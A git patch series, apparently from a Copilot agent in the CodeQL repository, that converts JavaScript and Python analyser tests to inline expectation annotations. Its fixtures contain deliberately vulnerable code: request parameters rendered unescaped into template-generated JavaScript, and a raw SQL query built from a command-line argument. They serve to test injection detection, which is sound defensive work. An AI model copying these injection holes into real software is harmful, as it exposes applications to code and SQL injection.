<198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 21:54:26 +0000 Subject: [PATCH 13/15] Convert JavaScript CodeInjection test to inline expectations --- .../frameworks/Templating/CodeInjection.qlref | 1 + .../frameworks/Templating/app.js | 26 +++++++++---------- .../Templating/views/angularjs_include.ejs | 4 +-- .../Templating/views/angularjs_sinks.ejs | 4 +-- .../frameworks/Templating/views/ejs_sinks.ejs | 6 ++--- .../frameworks/Templating/views/hbs_sinks.hbs | 6 ++--- .../frameworks/Templating/views/njk_sinks.njk | 10 +++---- 7 files changed, 29 insertions(+), 28 deletions(-) diff --git a/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref b/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref index 8783ddb3a8a6..bfeec8aec393 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref +++ b/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref @@ -1 +1,2 @@ query: Security/CWE-094/CodeInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/library-tests/frameworks/Templating/app.js b/javascript/ql/test/library-tests/frameworks/Templating/app.js index 8666d79b644f..2822d40be5c1 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/app.js +++ b/javascript/ql/test/library-tests/frameworks/Templating/app.js @@ -12,11 +12,11 @@ app.get('/ejs', (req, res) => { }, dataInStringLiteral: req.query.dataInStringLiteral, dataInStringLiteralRaw: req.query.dataInStringLiteralRaw, - dataInGeneratedCode: req.query.dataInGeneratedCode, + dataInGeneratedCode: req.query.dataInGeneratedCode, // $ Source dataInGeneratedCodeRaw: req.query.dataInGeneratedCodeRaw, - backslashSink1: req.query.backslashSink1, + backslashSink1: req.query.backslashSink1, // $ Source backslashSink2: req.query.backslashSink2, - dataInEventHandlerString: req.query.dataInEventHandlerString, + dataInEventHandlerString: req.query.dataInEventHandlerString, // $ Source dataInEventHandlerStringRaw: req.query.dataInEventHandlerStringRaw, }); }); @@ -31,11 +31,11 @@ app.get('/hbs', (req, res) => { }, dataInStringLiteral: req.query.dataInStringLiteral, dataInStringLiteralRaw: req.query.dataInStringLiteralRaw, - dataInGeneratedCode: req.query.dataInGeneratedCode, + dataInGeneratedCode: req.query.dataInGeneratedCode, // $ Source dataInGeneratedCodeRaw: req.query.dataInGeneratedCodeRaw, - backslashSink1: req.query.backslashSink1, + backslashSink1: req.query.backslashSink1, // $ Source backslashSink2: req.query.backslashSink2, - dataInEventHandlerString: req.query.dataInEventHandlerString, + dataInEventHandlerString: req.query.dataInEventHandlerString, // $ Source dataInEventHandlerStringRaw: req.query.dataInEventHandlerStringRaw, }); }); @@ -50,20 +50,20 @@ app.get('/njk', (req, res) => { }, dataInStringLiteral: req.query.dataInStringLiteral, dataInStringLiteralRaw: req.query.dataInStringLiteralRaw, - dataInGeneratedCode: req.query.dataInGeneratedCode, - dataInGeneratedCodeRaw: req.query.dataInGeneratedCodeRaw, + dataInGeneratedCode: req.query.dataInGeneratedCode, // $ Source + dataInGeneratedCodeRaw: req.query.dataInGeneratedCodeRaw, // $ Source dataInGeneratedCodeJsonRaw: req.query.dataInGeneratedCodeJsonRaw, - backslashSink1: req.query.backslashSink1, + backslashSink1: req.query.backslashSink1, // $ Source backslashSink2: req.query.backslashSink2, - dataInEventHandlerString: req.query.dataInEventHandlerString, - dataInEventHandlerStringRaw: req.query.dataInEventHandlerStringRaw, + dataInEventHandlerString: req.query.dataInEventHandlerString, // $ Source + dataInEventHandlerStringRaw: req.query.dataInEventHandlerStringRaw, // $ Source }); }); app.get('/angularjs', (req, res) => { res.render('angularjs_sinks', { - escapedHtml: req.query.escapedHtml, - rawHtml: req.query.rawHtml, + escapedHtml: req.query.escapedHtml, // $ Source + rawHtml: req.query.rawHtml, // $ Source }); }); diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_include.ejs b/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_include.ejs index 2d02e173275f..e9a6f436a8fe 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_include.ejs +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_include.ejs @@ -1,5 +1,5 @@
    - <%= escapedHtml %> - <%- rawHtml %> + <%= escapedHtml %> + <%- rawHtml %>
    diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_sinks.ejs b/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_sinks.ejs index 47105bb360ec..5dc0c0763cf3 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_sinks.ejs +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_sinks.ejs @@ -1,7 +1,7 @@ - <%= escapedHtml %> - <%- rawHtml %> + <%= escapedHtml %> + <%- rawHtml %> <% include angularjs_include %> diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/ejs_sinks.ejs b/javascript/ql/test/library-tests/frameworks/Templating/views/ejs_sinks.ejs index 42dfc124a709..b25de673433b 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/ejs_sinks.ejs +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/ejs_sinks.ejs @@ -10,15 +10,15 @@ var dataInStringLiteral = "<%= dataInStringLiteral %>"; var dataInStringLiteralRaw = "<%- dataInStringLiteralRaw %>"; - var dataInGeneratedCode = <%= dataInGeneratedCode %>; + var dataInGeneratedCode = <%= dataInGeneratedCode %>; // $ Alert var dataInGeneratedCodeRaw = <%- dataInGeneratedCodeRaw %>; - init("<%= backslashSink1 %>", "<%= backslashSink2 %>"); + init("<%= backslashSink1 %>", "<%= backslashSink2 %>"); // $ Alert var mustache = "{{ rawHtml }}"; - + <%- include('ejs_include1', { foo: rawHtml }) _%> diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/hbs_sinks.hbs b/javascript/ql/test/library-tests/frameworks/Templating/views/hbs_sinks.hbs index 198af1cd8d41..a723f95e7745 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/hbs_sinks.hbs +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/hbs_sinks.hbs @@ -22,15 +22,15 @@ var dataInStringLiteral = "{{ dataInStringLiteral }}"; var dataInStringLiteralRaw = "{{{ dataInStringLiteralRaw }}}"; - var dataInGeneratedCode = {{ dataInGeneratedCode }}; + var dataInGeneratedCode = {{ dataInGeneratedCode }}; // $ Alert var dataInGeneratedCodeRaw = {{{ dataInGeneratedCodeRaw }}}; - init("{{ backslashSink1 }}", "{{ backslashSink2 }}"); + init("{{ backslashSink1 }}", "{{ backslashSink2 }}"); // $ Alert var ejs = "<%= rawHtml %>"; - + diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/njk_sinks.njk b/javascript/ql/test/library-tests/frameworks/Templating/views/njk_sinks.njk index fcfba32a26c8..dc34a5c0bbb1 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/njk_sinks.njk +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/njk_sinks.njk @@ -10,16 +10,16 @@ var dataInStringLiteral = "{{ dataInStringLiteral }}"; var dataInStringLiteralRaw = "{{ dataInStringLiteralRaw | safe }}"; - var dataInGeneratedCode = {{ dataInGeneratedCode }}; - var dataInGeneratedCodeRaw = {{ dataInGeneratedCodeRaw | safe }}; + var dataInGeneratedCode = {{ dataInGeneratedCode }}; // $ Alert + var dataInGeneratedCodeRaw = {{ dataInGeneratedCodeRaw | safe }}; // $ Alert var dataInGeneratedCodeJsonRaw = {{ dataInGeneratedCodeJsonRaw | json | safe }}; - init("{{ backslashSink1 }}", "{{ backslashSink2 }}"); + init("{{ backslashSink1 }}", "{{ backslashSink2 }}"); // $ Alert var ejs = "<%= rawHtml %>"; - - + + From e25418f436e9dc94524831b82f91599d93845d10 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 22:24:36 +0000 Subject: [PATCH 14/15] Convert selected Python inline expectation tests --- .../general/CatchingBaseException.qlref | 1 + .../Exceptions/general/EmptyExcept.qlref | 1 + .../general/IllegalExceptionHandlerType.qlref | 1 + .../Exceptions/general/IllegalRaise.qlref | 1 + .../NotImplementedIsNotAnException.qlref | 1 + .../Exceptions/general/exceptions_test.py | 28 +++++++++---------- .../Exceptions/general/pypy_test.py | 3 +- .../IncorrectlyOverriddenMethod.qlref | 1 + ...IncorrectlySpecifiedOverriddenMethod.qlref | 1 + .../WrongNameForArgumentInCall.qlref | 1 + .../WrongNumberArgumentsInCall.qlref | 1 + .../query-tests/Functions/overriding/test.py | 14 +++++----- .../SqlInjection.qlref | 4 ++- .../test.py | 2 +- 14 files changed, 35 insertions(+), 25 deletions(-) diff --git a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref index bd98ca75af11..33b4697e7ef7 100644 --- a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref +++ b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref @@ -1 +1,2 @@ query: Exceptions/CatchingBaseException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref index 16e16f16ba5a..7a046d008cd2 100644 --- a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref +++ b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref @@ -1 +1,2 @@ query: Exceptions/EmptyExcept.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref b/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref index 4e3f71fe812a..7a7911ca4403 100644 --- a/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref +++ b/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref @@ -1 +1,2 @@ query: Exceptions/IllegalExceptionHandlerType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref b/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref index 95e65710025b..2bee772260a9 100644 --- a/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref +++ b/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref @@ -1 +1,2 @@ query: Exceptions/IllegalRaise.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref b/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref index 5b199983f759..a5e0761210e7 100644 --- a/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref +++ b/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref @@ -1 +1,2 @@ query: Exceptions/NotImplementedIsNotAnException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/exceptions_test.py b/python/ql/test/query-tests/Exceptions/general/exceptions_test.py index e5e9ea67a6e0..91acb9b9bf40 100644 --- a/python/ql/test/query-tests/Exceptions/general/exceptions_test.py +++ b/python/ql/test/query-tests/Exceptions/general/exceptions_test.py @@ -4,13 +4,13 @@ def ee1(val): try: val.attr - except: + except: # $ Alert[py/empty-except] Alert[py/catch-base-exception] pass def ee1(val): try: val.attr() - except TypeError: + except TypeError: # $ Alert[py/empty-except] pass def ee2(val): @@ -37,21 +37,21 @@ class NotException2(object): pass def illegal_raise_type(): - raise NotException1 + raise NotException1 # $ Alert[py/illegal-raise] def illegal_raise_value1(): - raise "Exception" + raise "Exception" # $ Alert[py/illegal-raise] def illegal_raise_value2(): - raise NotException2() + raise NotException2() # $ Alert[py/illegal-raise] def illegal_handler(): try: illegal_raise() - except NotException1: + except NotException1: # $ Alert[py/useless-except] #Must do something print("NotException1") - except NotException2: + except NotException2: # $ Alert[py/useless-except] #Must do something print("NotException2") @@ -69,7 +69,7 @@ class MyExc(ValueError): try: pass -except ValueError: +except ValueError: # $ Alert[py/empty-except] pass except MyExc: # $ MISSING:Alert[py/unreachable-except] # Missing due to dataflow limitiation preventing MyExc from being tracked here. pass @@ -82,11 +82,11 @@ class MySubExc(MyBaseExc): try: pass -except MyBaseExc: +except MyBaseExc: # $ Alert[py/empty-except] pass except MySubExc: # $ MISSING:Alert[py/unreachable-except] # Missing due to dataflow limitation preventing MyExc from being tracked here. pass -except Exception: +except Exception: # $ Alert[py/empty-except] pass @@ -94,7 +94,7 @@ class MySubExc(MyBaseExc): def catch_base_exception(): try: illegal_raise() - except BaseException: + except BaseException: # $ Alert[py/catch-base-exception] #Consumes KeyboardInterrupt pass @@ -135,7 +135,7 @@ def a_number(): def illegal_handler2(): try: illegal_raise() - except a_number(): + except a_number(): # $ Alert[py/useless-except] print ("Caught exception") def stop_iter_ok(seq): @@ -193,7 +193,7 @@ def ee8(x): #These are so common, we give warnings not errors. def foo(): - raise NotImplemented + raise NotImplemented # $ Alert[py/raise-not-implemented] def bar(): - raise NotImplemented() + raise NotImplemented() # $ Alert[py/raise-not-implemented] diff --git a/python/ql/test/query-tests/Exceptions/general/pypy_test.py b/python/ql/test/query-tests/Exceptions/general/pypy_test.py index 857e78d6d942..12d373e428e6 100644 --- a/python/ql/test/query-tests/Exceptions/general/pypy_test.py +++ b/python/ql/test/query-tests/Exceptions/general/pypy_test.py @@ -11,10 +11,9 @@ def __getattribute__(self, name): try: a = A() raise a - except 42: + except 42: # $ Alert[py/useless-except] #Some comment pass except A: #Another comment pass - diff --git a/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref index cc2a5f9f73df..9d5a8324c796 100644 --- a/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref +++ b/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref @@ -1 +1,2 @@ query: Functions/IncorrectlyOverriddenMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref index 958fcc629fff..258840b2fc43 100644 --- a/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref +++ b/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref @@ -1 +1,2 @@ query: Functions/IncorrectlySpecifiedOverriddenMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref b/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref index e68f904bc81c..c6b6ca3d30fa 100644 --- a/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref +++ b/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref @@ -1 +1,2 @@ query: Expressions/WrongNameForArgumentInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref b/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref index ee0b95d7b07e..68dc510d5c6e 100644 --- a/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref +++ b/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref @@ -1 +1,2 @@ query: Expressions/WrongNumberArgumentsInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/overriding/test.py b/python/ql/test/query-tests/Functions/overriding/test.py index 879efdbe2913..7c0ed5eb81bc 100644 --- a/python/ql/test/query-tests/Functions/overriding/test.py +++ b/python/ql/test/query-tests/Functions/overriding/test.py @@ -2,10 +2,10 @@ class Base(object): - def meth1(self): + def meth1(self): # $ Alert[py/inheritance/incorrect-overridden-signature] pass - def meth2(self, spam): + def meth2(self, spam): # $ Alert[py/inheritance/incorrect-overridden-signature] pass def meth3(self): @@ -13,10 +13,10 @@ def meth3(self): def foo(self): self.meth1() - self.meth1(0) - self.meth2() + self.meth1(0) # $ Alert[py/call/wrong-arguments] + self.meth2() # $ Alert[py/call/wrong-arguments] self.meth2(0) - self.meth1(spam="eggs") + self.meth1(spam="eggs") # $ Alert[py/call/wrong-named-argument] self.meth2(spam="eggs") class Derived(Base): @@ -44,7 +44,7 @@ def bar(self): class Abstract(object): - def meth(self): + def meth(self): # $ Alert[py/inheritance/incorrect-overridden-signature] raise NotImplementedError() @@ -109,7 +109,7 @@ def call_some(self): self.meth1() self.meth1(x=2) self.meth3() - self.meth3(x=2) + self.meth3(x=2) # $ Alert[py/call/wrong-named-argument] self.meth6(2, 3, 4) self.meth7() self.meth8(1,y=3) diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/SqlInjection.qlref b/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/SqlInjection.qlref index b6916bd2cd46..e19181577447 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/SqlInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/SqlInjection.qlref @@ -1,2 +1,4 @@ query: Security/CWE-089/SqlInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/test.py b/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/test.py index 97bfa393cedf..70959d0bff03 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/test.py +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/test.py @@ -3,4 +3,4 @@ import psycopg conn = psycopg.connect(...) -conn.execute(sys.argv[1]) +conn.execute(sys.argv[1]) # $ Alert From a713d75f0cb1cb42b5f0d813c2224a4e2a0a156c Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 22:29:24 +0000 Subject: [PATCH 15/15] Refine Python inline expectation conversions --- .../Exceptions/general/CatchingBaseException.qlref | 1 - .../query-tests/Exceptions/general/EmptyExcept.qlref | 1 - .../Exceptions/general/exceptions_test.py | 12 ++++++------ .../ql/test/query-tests/Functions/overriding/test.py | 8 ++++---- 4 files changed, 10 insertions(+), 12 deletions(-) diff --git a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref index 33b4697e7ef7..bd98ca75af11 100644 --- a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref +++ b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref @@ -1,2 +1 @@ query: Exceptions/CatchingBaseException.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref index 7a046d008cd2..16e16f16ba5a 100644 --- a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref +++ b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref @@ -1,2 +1 @@ query: Exceptions/EmptyExcept.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/exceptions_test.py b/python/ql/test/query-tests/Exceptions/general/exceptions_test.py index 91acb9b9bf40..2b2c2accf6e4 100644 --- a/python/ql/test/query-tests/Exceptions/general/exceptions_test.py +++ b/python/ql/test/query-tests/Exceptions/general/exceptions_test.py @@ -4,13 +4,13 @@ def ee1(val): try: val.attr - except: # $ Alert[py/empty-except] Alert[py/catch-base-exception] + except: pass def ee1(val): try: val.attr() - except TypeError: # $ Alert[py/empty-except] + except TypeError: pass def ee2(val): @@ -69,7 +69,7 @@ class MyExc(ValueError): try: pass -except ValueError: # $ Alert[py/empty-except] +except ValueError: pass except MyExc: # $ MISSING:Alert[py/unreachable-except] # Missing due to dataflow limitiation preventing MyExc from being tracked here. pass @@ -82,11 +82,11 @@ class MySubExc(MyBaseExc): try: pass -except MyBaseExc: # $ Alert[py/empty-except] +except MyBaseExc: pass except MySubExc: # $ MISSING:Alert[py/unreachable-except] # Missing due to dataflow limitation preventing MyExc from being tracked here. pass -except Exception: # $ Alert[py/empty-except] +except Exception: pass @@ -94,7 +94,7 @@ class MySubExc(MyBaseExc): def catch_base_exception(): try: illegal_raise() - except BaseException: # $ Alert[py/catch-base-exception] + except BaseException: #Consumes KeyboardInterrupt pass diff --git a/python/ql/test/query-tests/Functions/overriding/test.py b/python/ql/test/query-tests/Functions/overriding/test.py index 7c0ed5eb81bc..640563700460 100644 --- a/python/ql/test/query-tests/Functions/overriding/test.py +++ b/python/ql/test/query-tests/Functions/overriding/test.py @@ -21,10 +21,10 @@ def foo(self): class Derived(Base): - def meth1(self, spam): # $ Alert[py/inheritance/signature-mismatch] # Has 1 more arg, base called in Base.foo + def meth1(self, spam): # $ Alert[py/inheritance/signature-mismatch] Alert[py/inheritance/incorrect-overriding-signature] # Has 1 more arg, base called in Base.foo pass - def meth2(self): # $ Alert[py/inheritance/signature-mismatch] # Has 1 fewer arg, base called in Base.foo + def meth2(self): # $ Alert[py/inheritance/signature-mismatch] Alert[py/inheritance/incorrect-overriding-signature] # Has 1 fewer arg, base called in Base.foo pass def meth3(self, eggs): # $ Alert[py/inheritance/signature-mismatch] # Has 1 more arg. Method is not called. @@ -44,7 +44,7 @@ def bar(self): class Abstract(object): - def meth(self): # $ Alert[py/inheritance/incorrect-overridden-signature] + def meth(self): raise NotImplementedError() @@ -61,7 +61,7 @@ def meth(self, arg): class BlameBase(object): - def meth(self): + def meth(self): # $ Alert[py/inheritance/incorrect-overridden-signature] pass class Correct1(BlameBase):